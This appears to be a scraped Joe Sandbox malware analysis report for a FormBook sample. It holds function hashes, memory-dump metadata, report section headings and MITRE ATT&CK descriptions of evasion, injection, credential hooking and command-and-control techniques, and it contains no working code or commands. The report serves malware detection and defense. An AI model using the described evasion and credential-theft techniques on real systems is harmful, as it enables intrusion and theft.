Opcode ID: 683266b7c860b7b3983d82f0ede4a49f9e3dd1db176799be5c8468f20b0c6b1d
Instruction ID: 690734eb26468bb3deba331cea87d5e6e07efcbba2b77545114c719cb46c1d9f
Opcode Fuzzy Hash: 683266b7c860b7b3983d82f0ede4a49f9e3dd1db176799be5c8468f20b0c6b1d
Instruction Fuzzy Hash: F2F0A575544B04CFD718AB70AC8A71C3B70BB45726B508759E46E862F1DBB695C0DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02CF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02CF7E8B

Strings

-, xrefs: 02CF7DDD
+, xrefs: 02CF7DE8

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 4c44da7a87112538d1c61edf8c6364717e105263b0f8d310a4ea6d1fd48cee10
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 4691C371E002069FDBE4CF69C880BBEF7A5AF84324F55461AEA55EB2C0E7318A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02CB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 02CB9175
$, xrefs: 02CB9191

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: eec146b993264fa002e4cb6276111fa41974c0f17cfb4a18c87eb8a2dd9b68d2
Instruction ID: b4e1875562455700af7c4b90ffeaabc36e1134aa88aa02ef92132e73ef2a4a77
Opcode Fuzzy Hash: eec146b993264fa002e4cb6276111fa41974c0f17cfb4a18c87eb8a2dd9b68d2
Instruction Fuzzy Hash: 60813C71D002799BDB25CB54CC48BEEB7B8AF48714F0041EAEA19B7690D7309E84DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 02D3CFBD

Strings

@, xrefs: 02D3CF0A
@4_w@4_w, xrefs: 02D3CFD5, 02D3CFDA, 02D3CFF1

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4_w@4_w
API String ID: 4062629308-713214301
Opcode ID: 88fa6ccf6ec071278b716c2c84c59a5cb66a6b95c44793b435166ea266d98a50
Instruction ID: a9f03b8635e11d219fe54ce7e59a09e4575a827519f171847c6572d1b22a9f27
Opcode Fuzzy Hash: 88fa6ccf6ec071278b716c2c84c59a5cb66a6b95c44793b435166ea266d98a50
Instruction Fuzzy Hash: CC41BD71900254DFDB229FA4D840AAEBBBAEF44B04F20446AE915EB3A0D774DC45DF61

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hj3YCvtlg7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hj3YCvtlg7.exe.log

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
hj3YCvtlg7.exe

Function 010CD429 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Function 010CD438 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 010CADA8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 010C590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 010C44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 010CD680 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 010CD679 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Function 010CA168 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 010CB218 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Function 010CAF98 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 07341090 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre